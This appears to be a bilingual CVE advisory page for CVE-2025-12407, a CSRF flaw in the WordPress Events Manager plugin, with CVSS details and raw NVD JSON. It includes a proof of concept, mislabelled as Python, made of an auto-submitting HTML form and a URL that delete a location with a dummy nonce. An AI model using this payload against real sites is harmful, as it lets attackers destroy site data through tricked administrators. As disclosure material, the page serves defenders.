Security Vulnerability Report
中文
CVE-2025-12407 CVSS 4.3 MEDIUM

CVE-2025-12407

Published: 2025-12-12 12:15:45
Last Modified: 2026-04-15 00:35:42

Description

The Events Manager – Calendar, Bookings, Tickets, and more! plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 7.2.2.2. This is due to missing or incorrect nonce validation on the 'location_delete' action. This makes it possible for unauthenticated attackers to delete locations via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Events Manager插件 < 7.2.2.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-12407 - Delete Location --> <!DOCTYPE html> <html> <head> <title>Location Delete CSRF</title> </head> <body> <h1>Events Manager CSRF Vulnerability - Location Delete</h1> <p>This PoC demonstrates the CSRF vulnerability in Events Manager plugin.</p> <!-- Auto-submit form to delete location --> <form id="csrfForm" action="https://target-site.com/wp-admin/admin.php" method="POST"> <input type="hidden" name="page" value="events-manager-locations"> <input type="hidden" name="action" value="location_delete"> <input type="hidden" name="location_id" value="1"> <!-- Missing or incorrect nonce validation --> <input type="hidden" name="_wpnonce" value="any_value_works"> </form> <script> // Auto-submit when page loads document.getElementById('csrfForm').submit(); </script> <p>If you see this message, the attack was successful.</p> </body> </html> <!-- Alternative: URL-based CSRF --> <!-- https://target-site.com/wp-admin/admin.php?page=events-manager-locations&action=location_delete&location_id=1&_wpnonce=any_value -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12407", "sourceIdentifier": "[email protected]", "published": "2025-12-12T12:15:44.577", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Events Manager – Calendar, Bookings, Tickets, and more! plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 7.2.2.2. This is due to missing or incorrect nonce validation on the 'location_delete' action. This makes it possible for unauthenticated attackers to delete locations via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3392395/events-manager/trunk/em-actions.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a99d0220-38af-40fe-8b9f-af173fc41248?source=cve", "source": "[email protected]"}]}}